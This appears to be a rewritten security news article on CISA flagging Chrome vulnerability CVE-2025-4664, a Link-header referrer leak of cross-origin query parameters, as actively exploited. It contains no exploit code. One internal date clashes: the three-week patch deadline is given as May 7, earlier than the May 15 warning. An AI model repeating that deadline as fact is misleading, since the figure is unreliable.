CISA Identifies Recently Mitigated Chrome Vulnerability as Under Active Exploitation

On May 15, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) issued a warning to U.S. federal agencies regarding a significant vulnerability in the Chrome web browser, designated as CVE-2025-4664. The flaw poses a high risk due to its active exploitation in the wild. Researchers from Solidlab, led by Vsevolod Kokorin, initially discovered the weakness and published detailed technical information on May 5. Consequently, Google released security updates to mitigate the threat on May 14.

The vulnerability stems from inadequate policy enforcement within Chrome’s Loader component. Its successful exploitation could allow remote attackers to access cross-origin data through specially crafted HTML pages. Kokorin highlighted that while Chrome handles Link headers differently from other browsers by resolving them in subresource requests, this creates vulnerabilities. Specifically, if an attacker sets an unsafe referrer-policy in the Link header, they can proceed to capture sensitive query parameters embedded within URLs.

These query parameters can contain essential data that, particularly in OAuth workflows, could lead to account takeovers. Kokorin remarked that developers often overlook the risks posed by third-party resources, which could inadvertently expose sensitive information when exploited through images or other means.

While Google has yet to confirm any prior abuse of the vulnerability, the company stressed its potential for exploitation, noted by its inclusion in the advisory addressing public exploit availability. CISA subsequently categorized CVE-2025-4664 as an actively exploited vulnerability, adding it to its Known Exploited Vulnerabilities catalog. This catalog enumerates flaws that are currently being utilized in cyberattacks.

In compliance with the November 2021 Binding Operational Directive (BOD) 22-01, U.S. Federal Civilian Executive Branch agencies are mandated to apply patches for their Chrome installations within a three-week deadline, prompting necessary actions by May 7. Although this directive primarily pertains to federal entities, network defenders in all sectors are strongly encouraged to prioritize this patching to safeguard against potential breaches.

CISA has emphasized the critical nature of patching such vulnerabilities, which typically serve as common attack vectors for malicious cyber actors, posing significant threats to federal infrastructure.

This incident marks the second instance this year where Google patched an actively exploited zero-day vulnerability in Chrome, following the identification of another high-risk zero-day, CVE-2025-2783. This particular flaw was exploited in targeted cyber-espionage efforts against Russian governmental organizations, media outlets, and educational institutions. Researchers from Kaspersky discovered that attackers leveraged the CVE-2025-2783 exploit to circumvent Chrome’s sandbox protections and deploy malware on affected systems.